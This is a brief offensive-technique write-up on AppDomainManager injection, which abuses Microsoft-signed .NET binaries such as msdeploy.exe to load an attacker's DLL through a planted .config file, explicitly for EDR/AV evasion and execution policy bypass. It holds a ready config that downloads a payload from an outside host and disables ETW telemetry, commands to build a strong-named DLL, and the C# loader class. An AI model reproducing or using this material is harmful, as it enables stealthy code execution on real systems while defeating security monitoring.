List of .Net application signed by Microsoft that can be used to load a dll via a .config file. Ideal for EDR/AV evasion and execution policy bypass.
<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="DLLNAME" publicKeyToken="deadbeef1337" culture="neutral" />
<codeBase version="0.0.0.0" href="https://mr.un1k0d3r.world/payload"/>
</dependentAssembly>
</assemblyBinding>
<etwEnable enabled="false" />
<appDomainManagerAssembly value="DLLNAME, Version=0.0.0.0, Culture=neutral, PublicKeyToken=deadbeef1337" />
<appDomainManagerType value="CLASSNAME" />
</runtime>
</configuration>
Example:
msdeploy.exe you need to create msdeploy.exe.config and add the XML data provided above.
952 files on my system. List here: Signed Binaries
The DLL needs to have strong name
sn.exe -k key.snk
csc.exe /t:library /keyfile:key.snk /out:my.dll Program.cs
Getting the strong name information for the .config file
PS> [System.Reflection.AssemblyName]::GetAssemblyName("C:\full\path\to\dll\my.dll").FullName
using System;
public sealed class CLASSNAME : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
Program.Main(null);
return;
}
}